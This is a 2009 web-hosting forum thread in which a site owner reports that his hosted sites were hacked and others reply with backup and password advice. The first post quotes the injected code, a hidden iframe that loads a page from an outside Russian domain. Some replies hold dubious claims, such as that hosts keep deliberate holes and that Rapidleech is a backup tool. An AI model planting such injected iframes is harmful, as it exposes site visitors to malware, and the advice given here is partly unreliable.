1. Advertising
    y u no do it?

Advertising (learn more)

Advertise virtually anything here, with CPM banner ads, CPM email ads and CPC contextual links. You can target relevant areas of the site and show ads based on geographical location of the user if you wish.

Starts at just $1 per CPM or $0.10 per CPC.

Beware - Websites are being hacked on different Hosts

Discussion in 'Web Hosting' started by adsensecliks, Jan 30, 2009.

I have few sites on hostmonster and reliablehositng.com all are being hacked. Today i see all the sites showing blank page, all files show only this code "<u style=display:none><iframe src=http://kruiz-shop.ru/intr/tmp/?i=18dc6722a12deb97b02d4aa4b9574b8b width=110 height=230></iframe></u>"

Dont know why this cowards do this, but its really a pain for me to restore all the files, firstly due to recession i have lost the job, next this issue is making me spend more money.

I still dont know how they hacked the sites without ftp logins, and that too on quality highly rated hosting companies.

I urge that all DP members to be carefull, have backups for their websites. Dont share their ftp's.

Anyone who had this kind of problem plz share their experiences, let's discuss plans to avoid this terror on webhosting.

adsensecliks, Jan 30, 2009 IP
  2. innews

innews Well-Known Member

Best Answers:
    As Seller:
    100% - 0
    As Buyer:
    100% - 0
    all this happen due to unsecured ftp permission and when it get hacked you blame you host. so the motto of the story is secure your ftp with correct permission or else get ready to face this

innews, Jan 30, 2009 IP
  3. adsensecliks

adsensecliks Peon

Best Answers:
    As Seller:
    100% - 0
    As Buyer:
    100% - 0
    How to secure ftp permission? not blaming any host here.

adsensecliks, Jan 30, 2009 IP
  4. flamer

flamer Peon

Best Answers:
    As Seller:
    100% - 0
    As Buyer:
    100% - 0
    You cannot really say it can be the FTP connection which is unsecured.

If you had any scripts on your website, they might have glitches which might have caused it. That is why the only high rated and legal copies of scripts are advised to be used rather than any random and illegal copy.

It can be also that you have Viruses/Keyloggers in the computers via which the site panel might be accessed which caused problems.

Speaking of getting all the sites being hacked on a host, it can be something that they have had issues with the gadgets they have with them. Not even one hosting company would be 100% secured as they have to keep some glitches via which they basically can get their own webhosting site back themselves rather than bursting through the whole Hard drive they use and format them or decode the scripts.

Secondly, if you want your website to be secured, keep strong passwords and change it after every 2-3 months or within specific time. If you use scripts, then download them from the original website rather than the alternate path which no one recommends. DO NOT USE any illegal copies or buy it from unverified seller even if they offer it at low price (there can be exceptional cases for reputed companies). Buy original copies from the original seller or from the sites they recommend to buy from.

Thirdly, i would say, Hosts are not really to be blamed totally, they try to keep your sites secured as much as they can, It can be many other things which can cause hacking, but it is very less likely that the hosts are unsecured themselves as its their business and they dont want their reputation to be blown out. Reputation is what they live on everyday.

Hope it is helpful and understandable.

flamer, Jan 30, 2009 IP
  5. bud89027

bud89027 Peon

Best Answers:
    As Seller:
    100% - 0
    As Buyer:
    100% - 0
    Boy, This is scary stuff. Is there a laymens way to avoid all the hassle? And what do you guys consider as the best way to back up a website?

Thanks for any insight.

bud89027, Jan 30, 2009 IP
  6. flamer

flamer Peon

Best Answers:
    As Seller:
    100% - 0
    As Buyer:
    100% - 0
    Well, each control panel of a website has a backup panel, if it doesnt ask your host to give you a backup whenever you want. 95/100 hosts dont charge for backups, but yes you need to make sure that they provide you the backups.

Take a backup once in about 2 weeks atleast. If its a small website and you dont care about it much, then take a backup only once a month. But yea take it always to have no problems when they are about to hit you.

People nowadays use something called "Rapidleech", i think it is a tool which allows you to take automated backups. This script has heavy glitches (in my point of view and other reviews i have seen) and has cause problems. Hence 99/100 hosts have banned it. So i would just not advice you to use it if anyone even recommends you.

There are java backup scripts which are easy to use and they take backup for you and store it for you aswell. It just takes some time to do so, thats why people avoid it a bit. Although i would recommend if you wanna use it.

flamer, Jan 30, 2009 IP
  7. bud89027

bud89027 Peon

Best Answers:
    As Seller:
    100% - 0
    As Buyer:
    100% - 0
    Thanks, I will work on that this weekend, and then put in my bi-weekly schedule.
    Your help is greatly appreciated.

bud89027, Jan 30, 2009 IP
  8. flamer

flamer Peon

Best Answers:
    As Seller:
    100% - 0
    As Buyer:
    100% - 0
    No problem, Glad to help. Hopefully these advises help in keeping the sites safe and would possible reduce the risks of getting hacked as the hackers would know that there is no point of hacking the websites whose owners have a backup with them...

Just a reason to add in, recently the hackers hack the website for databases. These hackers are somewhat site owners. Later the hacked databases are added on a website and mass mailed to join their own website which leads large number of users to their site.

Additionally, to keep the Databases safe, keep the passwords for the databases with lots of characters and also symbols. Also change them information if you even have a doubt about it. The war between websites make hacking more vulnerable to your website. Hence try to keep as less aggressive owners out of your way and stay calm and talk general rather then swearing at them and being totally rude. Good relationships help things go smooth.

flamer, Jan 30, 2009 IP